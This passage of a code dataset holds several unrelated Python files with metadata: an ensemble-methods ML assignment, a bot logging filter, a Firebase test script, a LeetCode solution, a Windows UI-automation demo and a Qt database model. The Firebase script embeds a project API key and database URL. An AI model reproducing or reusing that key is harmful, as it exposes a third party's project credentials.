validation_data[validation_data[target] == -1]\n\n# Select 2 examples from the validation set for positive & negative loans\nsample_validation_data_risky = validation_risky_loans[0:2]\nsample_validation_data_safe = validation_safe_loans[0:2]\nsample_validation_data = sample_validation_data_safe.append(sample_validation_data_risky)\n\npredicted1 = sample_validation_data['safe_loans'].as_matrix()\npredicted2 = model_5.predict(sample_validation_data.drop('safe_loans', axis=1).as_matrix())\nprobabilities = model_5.predict_proba(sample_validation_data.drop('safe_loans', axis=1).as_matrix())\nprint(predicted1)\nprint(predicted2)\nprint(probabilities)\n\n\n# Evaluating the model on the validation data\nvalidation_Y = validation_data['safe_loans'].as_matrix()\nvalidation_X = validation_data.drop('safe_loans', axis=1).as_matrix()\naccuracy = model_5.score(validation_X, validation_Y) * 100\nprobabilities = model_5.predict_proba(validation_X)\nprobabilities = probabilities[:, 0]\nvalidation_data['predictions'] = probabilities\nhighest_5_predictions = validation_data.sort_values('predictions').head(5)\nprint(accuracy)\nprint(highest_5_predictions['predictions'])\n\n\n#####################################################################################################################\n\n\n# Effect of adding more trees\nmodel_10 = GradientBoostingClassifier(n_estimators=10, max_depth=6).fit(train_X, train_Y)\nmodel_50 = GradientBoostingClassifier(n_estimators=50, max_depth=6).fit(train_X, train_Y)\nmodel_100 = GradientBoostingClassifier(n_estimators=100, max_depth=6).fit(train_X, train_Y)\nmodel_200 = GradientBoostingClassifier(n_estimators=200, max_depth=6).fit(train_X, train_Y)\nmodel_500 = GradientBoostingClassifier(n_estimators=500, max_depth=6).fit(train_X, train_Y)\n\n\n# Plot the training and validation error vs. 
number of trees\n\ntrain_err_10 = 1 - model_10.score(train_X, train_Y)\ntrain_err_50 = 1 - model_50.score(train_X, train_Y)\ntrain_err_100 = 1 - model_100.score(train_X, train_Y)\ntrain_err_200 = 1 - model_200.score(train_X, train_Y)\ntrain_err_500 = 1 - model_500.score(train_X, train_Y)\ntraining_errors = [train_err_10, train_err_50, train_err_100,\n train_err_200, train_err_500]\n\n\nvalidation_err_10 = 1 - model_10.score(validation_X, validation_Y)\nvalidation_err_50 = 1 - model_50.score(validation_X, validation_Y)\nvalidation_err_100 = 1 - model_100.score(validation_X, validation_Y)\nvalidation_err_200 = 1 - model_200.score(validation_X, validation_Y)\nvalidation_err_500 = 1 - model_500.score(validation_X, validation_Y)\nvalidation_errors = [validation_err_10, validation_err_50, validation_err_100,\n validation_err_200, validation_err_500]\n\n\nn_trees = [10, 50, 100, 200, 500]\nplt.plot([10, 50, 100, 200, 500], training_errors, linewidth=4.0, label='Training error')\nplt.plot([10, 50, 100, 200, 500], validation_errors, linewidth=4.0, label='Validation error')\nmake_figure(dim=(10, 5), title='Error vs number of trees',\n xlabel='Number of trees',\n ylabel='Classification error',\n legend='best')\n", "repo_name": "MohamedAboBakr/Machine_Learning_WU_Specialization_Classification", "sub_path": "W5_Exploring Ensemble Methods/Assignment.py", "file_name": "Assignment.py", "file_ext": "py", "file_size_in_byte": 7087, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "matplotlib.pyplot.rcParams", "line_number": 16, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 16, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 18, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams.update", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 22, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 29, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 74, "usage_type": "call"}, {"api_name": "json.load", "line_number": 84, "usage_type": "call"}, {"api_name": "json.load", "line_number": 86, "usage_type": "call"}, {"api_name": "sklearn.ensemble.GradientBoostingClassifier", "line_number": 93, "usage_type": "call"}, {"api_name": "sklearn.ensemble.GradientBoostingClassifier", "line_number": 130, "usage_type": "call"}, {"api_name": "sklearn.ensemble.GradientBoostingClassifier", "line_number": 131, "usage_type": "call"}, {"api_name": 
"sklearn.ensemble.GradientBoostingClassifier", "line_number": 132, "usage_type": "call"}, {"api_name": "sklearn.ensemble.GradientBoostingClassifier", "line_number": 133, "usage_type": "call"}, {"api_name": "sklearn.ensemble.GradientBoostingClassifier", "line_number": 134, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 158, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 158, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 159, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 159, "usage_type": "name"}]}
+{"seq_id": "29397391314", "text": "import asyncio\nimport logging\nimport colorlog\nfrom threading import Thread\n\nfrom src import env\n\ngetLogger = colorlog.getLogger\n\ncolorlog.basicConfig(format='%(log_color)s%(asctime)s:%(levelname)s:%(name)s - %(message)s',\n datefmt='%Y-%m-%d-%H:%M:%S',\n level=colorlog.DEBUG if env.DEBUG else colorlog.INFO)\n\n_muted = colorlog.INFO if env.DEBUG else colorlog.WARNING\n_shut_upped = colorlog.ERROR if env.DEBUG else colorlog.CRITICAL\n\ngetLogger('apscheduler').setLevel(colorlog.WARNING)\ngetLogger('aiohttp_retry').setLevel(_muted)\ngetLogger('asyncio').setLevel(_muted)\ngetLogger('telethon').setLevel(_muted)\ngetLogger('aiosqlite').setLevel(_muted)\ngetLogger('tortoise').setLevel(_muted)\ngetLogger('asyncpg').setLevel(_muted)\n\n\n# flit log from apscheduler.scheduler\nclass APSCFilter(logging.Filter):\n def __init__(self):\n super().__init__()\n self.count = -3 # first 3 times muted\n\n def filter(self, record: logging.LogRecord) -> bool:\n msg = record.msg % record.args\n if 'skipped: maximum number of running instances reached' in msg:\n self.count += 1\n if self.count % 5 == 0:\n if self.count >= 15:\n exit(-1)\n coro = env.bot.send_message(\n env.MANAGER,\n 'RSS monitor tasks have conflicted too many times! Please store the log and restart.\\n'\n ' (sometimes it may be caused by too many subscriptions)\\n\\n'\n + msg\n )\n Thread(target=asyncio.run, args=(coro,)).start()\n return True\n if ' executed successfully' in msg:\n self.count = -3 # only >= 4 consecutive failures lead to a manager warning\n return False\n if 'Running job \"rss_monitor ' in msg:\n return False\n return True\n\n\napsc_filter = APSCFilter()\ngetLogger('apscheduler.scheduler').addFilter(apsc_filter)\ngetLogger('apscheduler.executors.default').addFilter(apsc_filter)\n", "repo_name": "rcy1314/Telegramrssfeed", "sub_path": "src/log.py", "file_name": "log.py", "file_ext": "py", "file_size_in_byte": 2038, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "32", "api": [{"api_name": "colorlog.getLogger", "line_number": 8, "usage_type": "attribute"}, {"api_name": "colorlog.basicConfig", "line_number": 10, "usage_type": "call"}, {"api_name": "src.env.DEBUG", "line_number": 12, "usage_type": "attribute"}, {"api_name": "src.env", "line_number": 12, "usage_type": "name"}, {"api_name": "colorlog.DEBUG", "line_number": 12, "usage_type": "attribute"}, {"api_name": "colorlog.INFO", "line_number": 12, "usage_type": "attribute"}, {"api_name": "src.env.DEBUG", "line_number": 14, "usage_type": "attribute"}, {"api_name": "src.env", "line_number": 14, "usage_type": "name"}, {"api_name": "colorlog.INFO", "line_number": 14, "usage_type": "attribute"}, {"api_name": "colorlog.WARNING", "line_number": 14, "usage_type": "attribute"}, {"api_name": "src.env.DEBUG", "line_number": 15, "usage_type": "attribute"}, {"api_name": "src.env", "line_number": 15, "usage_type": "name"}, {"api_name": "colorlog.ERROR", "line_number": 15, "usage_type": "attribute"}, {"api_name": "colorlog.CRITICAL", "line_number": 15, "usage_type": "attribute"}, {"api_name": "colorlog.WARNING", "line_number": 17, "usage_type": "attribute"}, {"api_name": "logging.Filter", "line_number": 27, "usage_type": "attribute"}, {"api_name": "logging.LogRecord", "line_number": 32, "usage_type": "attribute"}, {"api_name": "src.env.bot.send_message", "line_number": 39, "usage_type": "call"}, {"api_name": "src.env.bot", "line_number": 39, "usage_type": "attribute"}, {"api_name": "src.env", 
"line_number": 39, "usage_type": "name"}, {"api_name": "src.env.MANAGER", "line_number": 40, "usage_type": "attribute"}, {"api_name": "src.env", "line_number": 40, "usage_type": "name"}, {"api_name": "threading.Thread", "line_number": 45, "usage_type": "call"}, {"api_name": "asyncio.run", "line_number": 45, "usage_type": "attribute"}]}
+{"seq_id": "39556165633", "text": "import pyrebase\n\nconfig = {\n \"apiKey\": \"AIzaSyB_JDKzdASym_BESMe_mmXLtzL8K5glj1M\",\n \"authDomain\": \"hackgt-traffic.firebaseapp.com\",\n \"databaseURL\": \"https://hackgt-traffic.firebaseio.com/\",\n \"storageBucket\": \"hackgt-traffic.appspot.com\"\n}\n\nfirebase = pyrebase.initialize_app(config)\n\ndb = firebase.database()\ndb.child(\"cameras\").child(\"2\")\ndata = 123\ndb.set(data)\n", "repo_name": "keptsecret/hackgt6-traffic-rtanalysis", "sub_path": "firebase-helloworld.py", "file_name": "firebase-helloworld.py", "file_ext": "py", "file_size_in_byte": 367, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "32", "api": [{"api_name": "pyrebase.initialize_app", "line_number": 10, "usage_type": "call"}]}
+{"seq_id": "29993885364", "text": "from typing import List\n\n\nclass Solution:\n def longestCommonPrefix(self, strs: List[str]) -> str:\n if not strs:\n return \"\"\n \n if len(strs) == 1:\n return strs[0]\n \n result = strs[0]\n for i in range(1, len(strs)):\n length = min(len(result), len(strs[i]))\n k = 0\n while k < length:\n if result[k] == strs[i][k]:\n k += 1\n else:\n break\n result = result[:k]\n \n return \"\".join(result)\n ", "repo_name": "JoanWu5/leetcode-lintcode-python", "sub_path": "string/14. Longest Common Prefix.py", "file_name": "14. Longest Common Prefix.py", "file_ext": "py", "file_size_in_byte": 582, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "typing.List", "line_number": 5, "usage_type": "name"}]}
+{"seq_id": "13557008896", "text": "#!python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nimport time\nimport subprocess\n\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))) # not required after 'pip install uiautomation'\nimport uiautomation as automation\n\n\ndef main():\n cmdWindow = automation.GetConsoleWindow()\n subprocess.Popen('mmc.exe devmgmt.msc')\n time.sleep(1)\n mmcWindow = automation.WindowControl(searchDepth = 1, ClassName = 'MMCMainFrame')\n tree = mmcWindow.TreeControl()\n for item, depth in automation.WalkControl(tree, includeTop = True):\n if isinstance(item, automation.TreeItemControl): #or item.ControlType == automation.ControlType.TreeItemControl\n item.Select()\n if automation.ExpandCollapseState.Collapsed == item.CurrentExpandCollapseState():\n item.Expand(0)\n automation.Logger.WriteLine(' ' * (depth - 1) * 4 + item.Name, automation.ConsoleColor.Green)\n time.sleep(0.1)\n if cmdWindow:\n automation.Logger.ColorfulWriteLine('Scroll to top by SendKeys Ctrl+Home ')\n cmdWindow.SetActive(waitTime = 1)\n mmcWindow.SetActive(waitTime = 1)\n tree.SendKeys('{Ctrl}{Home}', waitTime = 1)\n if cmdWindow:\n automation.Logger.ColorfulWriteLine('Scroll to bottom by SendKeys Ctrl+End ')\n cmdWindow.SetActive(waitTime = 1)\n mmcWindow.SetActive(waitTime = 1)\n tree.SendKeys('{Ctrl}{End}', waitTime = 1)\n if cmdWindow:\n automation.Logger.ColorfulWriteLine('Scroll to top by WheelUp ')\n cmdWindow.SetActive(waitTime = 1)\n print(tree.Handle, tree.Element, len(tree.GetChildren()))\n # before expand, tree has no scrollbar. after expand, tree has a scrollbar.\n # need to Refind on some PCs before find ScrollBarControl from tree\n # maybe the old element has no scrollbar info\n tree.Refind()\n print(tree.Handle, tree.Element, len(tree.GetChildren()))\n vScrollBar = tree.ScrollBarControl(AutomationId = 'NonClientVerticalScrollBar')\n vScrollBarRect = vScrollBar.BoundingRectangle\n thumb = vScrollBar.ThumbControl()\n while True:\n vPercent = tree.CurrentVerticalScrollPercent()\n vPercent2 = vScrollBar.RangeValuePatternCurrentValue()\n print('TreeControl.CurrentVerticalScrollPercent', vPercent)\n print('ScrollBarControl.RangeValuePatternCurrentValue', vPercent2)\n if vPercent2 > 0:\n tree.WheelUp(waitTime = 0.1)\n else:\n break\n if cmdWindow:\n automation.Logger.ColorfulWriteLine('Scroll to bottom by WheelDown ')\n cmdWindow.SetActive(waitTime = 1)\n while True:\n vPercent = tree.CurrentVerticalScrollPercent()\n vPercent2 = vScrollBar.RangeValuePatternCurrentValue()\n print('TreeControl.CurrentVerticalScrollPercent', vPercent)\n print('ScrollBarControl.RangeValuePatternCurrentValue', vPercent2)\n if vPercent2 < 100:\n tree.WheelDown(waitTime = 0.1)\n else:\n break\n if cmdWindow:\n automation.Logger.ColorfulWriteLine('Scroll by DragDrop ')\n cmdWindow.SetActive(waitTime = 1)\n mmcWindow.SetActive(waitTime = 1)\n x, y = thumb.MoveCursorToMyCenter()\n automation.DragDrop(x, y, x, vScrollBarRect[1], waitTime = 1)\n x, y = thumb.MoveCursorToMyCenter()\n automation.DragDrop(x, y, x, vScrollBarRect[3])\n mmcWindow.Close()\n\n\nif __name__ == '__main__':\n main()\n cmdWindow = automation.GetConsoleWindow()\n if cmdWindow:\n cmdWindow.SetActive()\n input('\\npress Enter to exit\\n')\n", "repo_name": "guolaok/Python-UIAutomation-for-Windows", "sub_path": "demos/automation_devicemanager.py", "file_name": "automation_devicemanager.py", "file_ext": "py", "file_size_in_byte": 3623, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": 
"github-code", "pt": "32", "api": [{"api_name": "sys.path.append", "line_number": 9, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 9, "usage_type": "call"}, {"api_name": "uiautomation.GetConsoleWindow", "line_number": 14, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 15, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 16, "usage_type": "call"}, {"api_name": "uiautomation.WindowControl", "line_number": 17, "usage_type": "call"}, {"api_name": "uiautomation.WalkControl", "line_number": 19, "usage_type": "call"}, {"api_name": "uiautomation.TreeItemControl", "line_number": 20, "usage_type": "attribute"}, {"api_name": "uiautomation.ExpandCollapseState", "line_number": 22, "usage_type": "attribute"}, {"api_name": "uiautomation.Logger.WriteLine", "line_number": 24, "usage_type": "call"}, {"api_name": "uiautomation.Logger", "line_number": 24, "usage_type": "attribute"}, {"api_name": "uiautomation.ConsoleColor", "line_number": 24, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 25, "usage_type": "call"}, {"api_name": "uiautomation.Logger.ColorfulWriteLine", "line_number": 27, "usage_type": "call"}, {"api_name": "uiautomation.Logger", "line_number": 27, "usage_type": "attribute"}, {"api_name": "uiautomation.Logger.ColorfulWriteLine", "line_number": 32, "usage_type": "call"}, {"api_name": "uiautomation.Logger", "line_number": 32, "usage_type": "attribute"}, {"api_name": "uiautomation.Logger.ColorfulWriteLine", "line_number": 37, "usage_type": "call"}, {"api_name": "uiautomation.Logger", "line_number": 37, "usage_type": "attribute"}, {"api_name": "uiautomation.Logger.ColorfulWriteLine", "line_number": 58, "usage_type": "call"}, {"api_name": "uiautomation.Logger", "line_number": 58, "usage_type": "attribute"}, {"api_name": "uiautomation.Logger.ColorfulWriteLine", "line_number": 70, "usage_type": "call"}, {"api_name": "uiautomation.Logger", "line_number": 70, "usage_type": "attribute"}, {"api_name": "uiautomation.DragDrop", "line_number": 74, "usage_type": "call"}, {"api_name": "uiautomation.DragDrop", "line_number": 76, "usage_type": "call"}, {"api_name": "uiautomation.GetConsoleWindow", "line_number": 82, "usage_type": "call"}]}
+{"seq_id": "31698715801", "text": "from PySide6.QtCore import Qt, Slot, QTimer, QModelIndex\nfrom PySide6.QtGui import QFont\nfrom spinedb_api.parameter_value import join_value_and_type\nfrom ...helpers import rows_to_row_count_tuples, parameter_identifier\nfrom ...fetch_parent import FlexibleFetchParent\nfrom ..widgets.custom_menus import ParameterViewFilterMenu\nfrom ...mvcmodels.compound_table_model import CompoundWithEmptyTableModel\nfrom .empty_parameter_models import (\n EmptyObjectParameterDefinitionModel,\n EmptyObjectParameterValueModel,\n EmptyRelationshipParameterDefinitionModel,\n EmptyRelationshipParameterValueModel,\n)\nfrom .single_parameter_models import (\n SingleObjectParameterDefinitionModel,\n SingleObjectParameterValueModel,\n SingleRelationshipParameterDefinitionModel,\n SingleRelationshipParameterValueModel,\n)\n\n\nclass CompoundParameterModel(CompoundWithEmptyTableModel):\n \"\"\"A model that concatenates several single parameter models\n and one empty parameter model.\n \"\"\"\n\n def __init__(self, parent, db_mngr, *db_maps):\n \"\"\"\n Args:\n parent (SpineDBEditor): the parent object\n db_mngr (SpineDBManager): the database manager\n *db_maps (DiffDatabaseMapping): the database maps included in the model\n \"\"\"\n super().__init__(parent=parent, header=self._make_header())\n self._parent = parent\n self.db_mngr = db_mngr\n self.db_maps = db_maps\n self._filter_class_ids = {}\n self._auto_filter_menus = {}\n self._auto_filter = {}\n self._filter_timer = QTimer(self)\n self._filter_timer.setSingleShot(True)\n self._filter_timer.setInterval(100)\n self._filter_timer.timeout.connect(self.refresh)\n self._fetch_parent = FlexibleFetchParent(\n self.item_type,\n accepts_item=self.accepts_item,\n shows_item=self.shows_item,\n handle_items_added=self.handle_items_added,\n handle_items_removed=self.handle_items_removed,\n handle_items_updated=self.handle_items_updated,\n owner=self,\n )\n\n def canFetchMore(self, _parent):\n result = False\n for db_map in self.db_maps:\n result |= self.db_mngr.can_fetch_more(db_map, self._fetch_parent)\n return result\n\n def fetchMore(self, _parent):\n for db_map in self.db_maps:\n self.db_mngr.fetch_more(db_map, self._fetch_parent)\n\n def accepts_item(self, item, db_map):\n return item.get(self.entity_class_id_key) is not None\n\n def shows_item(self, item, db_map):\n return any(m.db_map == db_map and m.filter_accepts_item(item) for m in self.accepted_single_models())\n\n def _make_header(self):\n raise NotImplementedError()\n\n @property\n def entity_class_type(self):\n \"\"\"Returns the entity_class type, either 'object_class' or 'relationship_class'.\n\n Returns:\n str\n \"\"\"\n raise NotImplementedError()\n\n @property\n def item_type(self):\n \"\"\"Returns the parameter item type, either 'parameter_definition' or 'parameter_value'.\n\n Returns:\n str\n \"\"\"\n raise NotImplementedError()\n\n @property\n def _single_model_type(self):\n \"\"\"\n Returns a constructor for the single models.\n\n Returns:\n SingleParameterModel\n \"\"\"\n return {\n \"object_class\": {\n \"parameter_definition\": SingleObjectParameterDefinitionModel,\n \"parameter_value\": SingleObjectParameterValueModel,\n },\n \"relationship_class\": {\n \"parameter_definition\": SingleRelationshipParameterDefinitionModel,\n \"parameter_value\": SingleRelationshipParameterValueModel,\n },\n }[self.entity_class_type][self.item_type]\n\n @property\n def _empty_model_type(self):\n \"\"\"\n Returns a constructor for the empty model.\n\n Returns:\n 
EmptyParameterModel\n \"\"\"\n return {\n \"object_class\": {\n \"parameter_definition\": EmptyObjectParameterDefinitionModel,\n \"parameter_value\": EmptyObjectParameterValueModel,\n },\n \"relationship_class\": {\n \"parameter_definition\": EmptyRelationshipParameterDefinitionModel,\n \"parameter_value\": EmptyRelationshipParameterValueModel,\n },\n }[self.entity_class_type][self.item_type]\n\n @property\n def entity_class_id_key(self):\n \"\"\"\n Returns the key corresponding to the entity_class id (either \"object_class_id\" or \"relationship_class_id\")\n\n Returns:\n str\n \"\"\"\n return {\"object_class\": \"object_class_id\", \"relationship_class\": \"relationship_class_id\"}[\n self.entity_class_type\n ]\n\n @property\n def parameter_definition_id_key(self):\n return {\"parameter_definition\": \"id\", \"parameter_value\": \"parameter_id\"}[self.item_type]\n\n def init_model(self):\n \"\"\"Initializes the model.\"\"\"\n super().init_model()\n self._filter_class_ids = {}\n self._auto_filter = {}\n self.empty_model.fetchMore(QModelIndex())\n while self._auto_filter_menus:\n _, menu = self._auto_filter_menus.popitem()\n menu.wipe_out()\n\n def get_auto_filter_menu(self, logical_index):\n \"\"\"Returns auto filter menu for given logical index from header view.\n\n Args:\n logical_index (int)\n\n Returns:\n ParameterViewFilterMenu\n \"\"\"\n return self._make_auto_filter_menu(self.header[logical_index])\n\n def _make_auto_filter_menu(self, field):\n if field not in self._auto_filter_menus:\n self._auto_filter_menus[field] = menu = ParameterViewFilterMenu(\n self._parent,\n self.db_mngr,\n self.db_maps,\n self.item_type,\n self.entity_class_id_key,\n field,\n show_empty=False,\n )\n menu.filterChanged.connect(self.set_auto_filter)\n return self._auto_filter_menus[field]\n\n def headerData(self, section, orientation=Qt.Orientation.Horizontal, role=Qt.ItemDataRole.DisplayRole):\n \"\"\"Returns an italic font in case the given column has an autofilter installed.\"\"\"\n italic_font = QFont()\n italic_font.setItalic(True)\n if (\n role == Qt.ItemDataRole.FontRole\n and orientation == Qt.Orientation.Horizontal\n and self._auto_filter.get(self.header[section], {}) != {}\n ):\n return italic_font\n return super().headerData(section, orientation, role)\n\n def _create_empty_model(self):\n \"\"\"Returns the empty model for this compound model.\n\n Returns:\n EmptyParameterModel\n \"\"\"\n return self._empty_model_type(self, self.header, self.db_mngr)\n\n def filter_accepts_model(self, model):\n \"\"\"Returns a boolean indicating whether the given model passes the filter for compound model.\n\n Args:\n model (SingleParameterModel, EmptyParameterModel)\n\n Returns:\n bool\n \"\"\"\n if not model.can_be_filtered:\n return True\n if not self._auto_filter_accepts_model(model):\n return False\n if not self._class_filter_accepts_model(model):\n return False\n return True\n\n def _class_filter_accepts_model(self, model):\n if not self._filter_class_ids:\n return True\n return model.entity_class_id in self._filter_class_ids.get(model.db_map, set())\n\n def _auto_filter_accepts_model(self, model):\n if None in self._auto_filter.values():\n return False\n for values in self._auto_filter.values():\n if not values:\n continue\n for db_map, entity_class_id in values:\n if model.db_map == db_map and (entity_class_id is None or model.entity_class_id == entity_class_id):\n break\n else: # nobreak\n return False\n return True\n\n def accepted_single_models(self):\n \"\"\"Returns a list of accepted single models by 
calling filter_accepts_model\n on each of them, just for convenience.\n\n Returns:\n list\n \"\"\"\n return [m for m in self.single_models if self.filter_accepts_model(m)]\n\n def _invalidate_filter(self):\n \"\"\"Sets the filter invalid.\"\"\"\n self._filter_timer.start()\n\n def stop_invalidating_filter(self):\n \"\"\"Stops invalidating the filter.\"\"\"\n self._filter_timer.stop()\n\n def set_filter_class_ids(self, class_ids):\n if class_ids != self._filter_class_ids:\n self._filter_class_ids = class_ids\n self._invalidate_filter()\n\n def clear_auto_filter(self):\n self._auto_filter = {}\n self._invalidate_filter()\n\n @Slot(str, object)\n def set_auto_filter(self, field, values):\n \"\"\"Updates and applies the auto filter.\n\n Args:\n field (str): the field name\n values (dict): mapping (db_map, entity_class_id) to set of valid values\n \"\"\"\n self._set_compound_auto_filter(field, values)\n for model in self.accepted_single_models():\n self._set_single_auto_filter(model, field)\n\n def _set_compound_auto_filter(self, field, values):\n \"\"\"Sets the auto filter for given column in the compound model.\n\n Args:\n field (str): the field name\n values (set): set of valid (db_map, item_type, id) tuples\n \"\"\"\n if self._auto_filter.setdefault(field, {}) == values:\n return\n self._auto_filter[field] = values\n self._invalidate_filter()\n\n def _set_single_auto_filter(self, model, field):\n \"\"\"Sets the auto filter for given column in the given single model.\n\n Args:\n model (SingleParameterModel): the model\n field (str): the field name\n\n Returns:\n bool: True if the auto-filtered values were updated, None otherwise\n \"\"\"\n values = self._auto_filter[field].get((model.db_map, model.entity_class_id), set())\n if model.set_auto_filter(field, values):\n self._invalidate_filter()\n\n def _row_map_iterator_for_model(self, model):\n \"\"\"Yields row map for the given model.\n Reimplemented to take filter status into account.\n\n Args:\n model (SingleParameterModel, EmptyParameterModel)\n\n Yields:\n tuple: (model, row number) for each accepted row\n \"\"\"\n if not self.filter_accepts_model(model):\n return ()\n for i in model.accepted_rows():\n yield (model, i)\n\n def _models_with_db_map(self, db_map):\n \"\"\"Returns a collection of single models with given db_map.\n\n Args:\n db_map (DiffDatabaseMapping)\n\n Returns:\n list\n \"\"\"\n return [m for m in self.single_models if m.db_map == db_map]\n\n def _items_per_class(self, items):\n \"\"\"Returns a dict mapping entity_class ids to a set of items.\n\n Args:\n items (list)\n\n Returns:\n dict\n \"\"\"\n d = dict()\n for item in items:\n entity_class_id = item.get(self.entity_class_id_key)\n if not entity_class_id:\n continue\n d.setdefault(entity_class_id, list()).append(item)\n return d\n\n def handle_items_added(self, db_map_data):\n \"\"\"Runs when either parameter definitions or values are added to the dbs.\n Adds necessary sub-models and initializes them with data.\n Also notifies the empty model so it can remove rows that are already in.\n\n Args:\n db_map_data (dict): list of added dict-items keyed by DiffDatabaseMapping\n \"\"\"\n for db_map, items in db_map_data.items():\n db_map_single_models = [m for m in self.single_models if m.db_map is db_map]\n existing_ids = set().union(*(m.item_ids() for m in db_map_single_models))\n items_per_class = self._items_per_class(items)\n for entity_class_id, class_items in items_per_class.items():\n ids_committed = list()\n ids_uncommitted = list()\n for item in class_items:\n 
is_committed = db_map.commit_id() is None or item[\"commit_id\"] != db_map.commit_id()\n item_id = item[\"id\"]\n if item_id in existing_ids:\n continue\n if is_committed:\n ids_committed.append(item_id)\n else:\n ids_uncommitted.append(item_id)\n self._add_parameter_data(db_map, entity_class_id, ids_committed, committed=True)\n self._add_parameter_data(db_map, entity_class_id, ids_uncommitted, committed=False)\n self.empty_model.handle_items_added(db_map_data)\n\n def _get_insert_position(self, model):\n if model.committed:\n return super()._get_insert_position(model)\n return len(self.single_models)\n\n def _create_single_model(self, db_map, entity_class_id, committed):\n model = self._single_model_type(self.header, self.db_mngr, db_map, entity_class_id, committed)\n self._connect_single_model(model)\n for field in self._auto_filter:\n self._set_single_auto_filter(model, field)\n return model\n\n def _add_parameter_data(self, db_map, entity_class_id, ids, committed):\n \"\"\"Creates new single model and resets it with the given parameter ids.\n\n Args:\n db_map (DiffDatabaseMapping): database map\n entity_class_id (int): parameter's entity class id\n ids (list of int): parameter ids\n committed (bool): True if the ids have been committed, False otherwise\n \"\"\"\n if not ids:\n return\n if committed:\n existing = next(\n (m for m in self.single_models if (m.db_map, m.entity_class_id) == (db_map, entity_class_id)), None\n )\n if existing is not None:\n existing.add_rows(ids)\n return\n model = self._create_single_model(db_map, entity_class_id, committed)\n model.reset_model(ids)\n\n def handle_items_updated(self, db_map_data):\n \"\"\"Runs when either parameter definitions or values are updated in the dbs.\n Emits dataChanged so the parameter_name column is refreshed.\n\n Args:\n db_map_data (dict): list of updated dict-items keyed by DiffDatabaseMapping\n \"\"\"\n self._emit_data_changed_for_column(\"parameter_name\")\n # NOTE: parameter_definition names aren't refreshed unless we emit dataChanged,\n # whereas entity and class names are. 
Why?\n\n def handle_items_removed(self, db_map_data):\n \"\"\"Runs when either parameter definitions or values are removed from the dbs.\n Removes the affected rows from the corresponding single models.\n\n Args:\n db_map_data (dict): list of removed dict-items keyed by DiffDatabaseMapping\n \"\"\"\n self.layoutAboutToBeChanged.emit()\n for db_map, items in db_map_data.items():\n items_per_class = self._items_per_class(items)\n for model in self._models_with_db_map(db_map):\n removed_ids = [x[\"id\"] for x in items_per_class.get(model.entity_class_id, {})]\n if not removed_ids:\n continue\n removed_rows = [row for row in range(model.rowCount()) if model._main_data[row] in removed_ids]\n for row, count in sorted(rows_to_row_count_tuples(removed_rows), reverse=True):\n del model._main_data[row : row + count]\n self._do_refresh()\n self.layoutChanged.emit()\n\n def _emit_data_changed_for_column(self, field):\n \"\"\"Lazily emits data changed for an entire column.\n\n Args:\n field (str): the column header\n \"\"\"\n try:\n column = self.header.index(field)\n except ValueError:\n return\n self.dataChanged.emit(\n self.index(0, column), self.index(self.rowCount() - 1, column), [Qt.ItemDataRole.DisplayRole]\n )\n\n def db_item(self, index):\n sub_index = self.map_to_sub(index)\n return sub_index.model().db_item(sub_index)\n\n def db_map_id(self, index):\n sub_index = self.map_to_sub(index)\n sub_model = sub_index.model()\n if sub_model is None:\n return None, None\n return sub_model.db_map, sub_model.item_id(sub_index.row())\n\n def index_name(self, index):\n \"\"\"Generates a name for data at given index.\n\n Args:\n index (QModelIndex): index to model\n\n Returns:\n str: label identifying the data\n \"\"\"\n item = self.db_item(index)\n if item is None:\n return \"\"\n database = self.index(index.row(), self.columnCount() - 1).data()\n name_key = {\n \"parameter_definition\": {\n \"object_class\": \"object_class_name\",\n \"relationship_class\": \"relationship_class_name\",\n },\n \"parameter_value\": {\"object_class\": \"object_name\", \"relationship_class\": \"object_name_list\"},\n }[self.item_type][self.entity_class_type]\n name = item[name_key]\n names = [name] if not isinstance(name, tuple) else list(name)\n alternative_name = {\"parameter_definition\": lambda x: None, \"parameter_value\": lambda x: x[\"alternative_name\"]}[\n self.item_type\n ](item)\n return parameter_identifier(database, 